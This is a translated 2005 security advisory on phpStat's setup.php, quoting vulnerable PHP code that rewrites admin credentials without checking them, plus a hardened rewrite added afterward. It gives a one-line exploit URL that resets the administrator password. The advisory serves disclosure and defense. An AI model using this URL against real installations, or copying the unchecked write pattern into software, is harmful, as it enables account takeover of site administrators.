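[Translation] phpStat 'setup.php' contains a vulnerability that lets remote attackers change the administrator password
Translated by: fpx[BCT] Translation site: Bug.Center.Team http://www.cnbct.org
SecurityTracker ID: 1014064
Advisory reference: http://securitytracker.com/id?1014064
CVE reference: GENERIC-MAP-NOMATCH
Date: May 27, 2005
Impact: An attacker can modify information over the network
Summary: The SoulBlack security group has reported a vulnerability in phpStat that a remote attacker can exploit to obtain administrator information. By constructing a special URL, the attacker can use 'setup.php' to change any user's password and then log in as that user.
Demonstration:
setup.php?check=yes&username=admin&password=admin
Solution: No official solution is available yet.
Vendor URL: phpstat.sourceforge.net/journal/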
-------------------------------------------------------------
* Vulnerable code *
The vulnerability is in the $check variable of setup.php.
include("config.php");
include("$path_data/setup.php");   // loads the stored $username and $password
$check = $_REQUEST['check'];
$pass = $_REQUEST['pass'];
$user = $_REQUEST['user'];
if ($check == "admin" && $pass == $password && $user == $username) {
    showsetup();
} elseif (($check == "admin") && ($pass != $password || $user != $username)) {
    adminerror();
} elseif ($check == "yes") {
    // no credential check on this branch
    write($_REQUEST);
} else {
    admin();
}
/*
setup.php?check=yes..... is passed to the write() function
*/
function write($_REQUEST) {
    include("config.php");
    // . . . . (lines omitted in the advisory)
    // the new credentials are taken straight from the request
    $admin = strtolower($_REQUEST['admin']);
    $username = strtolower($_REQUEST['username']);
    $password = strtolower($_REQUEST['password']);
    $fp = fopen("$path_data/setup.php", "wb")
        or die ("The File \"$path_data/setup.php\" does not exist");
    flock($fp, 2);
    // the settings file is rewritten, including $username and $password
    fputs($fp, "<?php\n\$show = \"$show\";\n\$refshow = \"$refshow\";\n"
        . "\$ldec = \"$ldec\";\n\$lcolor = \"$lcolor\";\n\$hcolor = \"$hcolor\";\n"
        . "\$font_family = \"$font_family\";\n\$font_size = \"$font_size\";\n"
        . "\$color = \"$color\";\n\$font_style = \"$font_style\";\n"
        . "\$font_weight = \"$font_weight\";\n\$letter_spacing = \"$letter_spacing\";\n"
        . "\$admin = \"$admin\";\n\$username = \"$username\";\n"
        . "\$password = \"$password\";\n?>");
    flock($fp, 1);
    fclose($fp);
}
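Exploitation:
setup.php?check=yes&username=admin&password=admin
This changes the admin password. The above is already the fully translated version! The rest is just examples! Of course they are in English! Did you expect them to be explained in Chinese!?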
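A hardened form of the check=yes branch shown above, as an added example that is not part of the original advisory or of phpStat's code. The names save_settings() and handle_setup(), the array-based settings, and storing the password with password_hash() are assumptions made for the illustration:

```php
<?php
// Added example, not phpStat code. Hypothetical names: save_settings(),
// handle_setup(). Assumes the stored password is a password_hash() value.

function save_settings(string $file, array $settings): void {
    $out = "<?php\n";
    foreach ($settings as $name => $value) {
        // var_export() emits the value as a quoted PHP string literal.
        $out .= '$' . $name . ' = ' . var_export((string)$value, true) . ";\n";
    }
    file_put_contents($file, $out, LOCK_EX);
}

function handle_setup(array $req, array $current, string $file): string {
    // Check the caller's current credentials before any branch that changes state.
    $userOk = hash_equals($current['username'], (string)($req['user'] ?? ''));
    $passOk = password_verify((string)($req['pass'] ?? ''), $current['password']);
    if (!($userOk && $passOk)) {
        return 'denied';
    }
    if (($req['check'] ?? '') !== 'yes') {
        return 'showsetup';
    }
    // Copy only the known credential fields; new passwords are stored hashed.
    $new = $current;
    if (isset($req['username'])) {
        $new['username'] = strtolower((string)$req['username']);
    }
    if (isset($req['password'])) {
        $new['password'] = password_hash((string)$req['password'], PASSWORD_DEFAULT);
    }
    save_settings($file, $new);
    return 'saved';
}

// Constructed sample data, written to a temporary file.
$file = tempnam(sys_get_temp_dir(), 'setup');
$current = ['username' => 'admin',
            'password' => password_hash('old-secret', PASSWORD_DEFAULT)];

// Request shaped like the advisory's: no current credentials supplied.
$anon = ['check' => 'yes', 'username' => 'admin', 'password' => 'admin'];
echo handle_setup($anon, $current, $file), "\n";

// The same change, sent together with the current credentials.
$auth = $anon + ['user' => 'admin', 'pass' => 'old-secret'];
echo handle_setup($auth, $current, $file), "\n";
unlink($file);
```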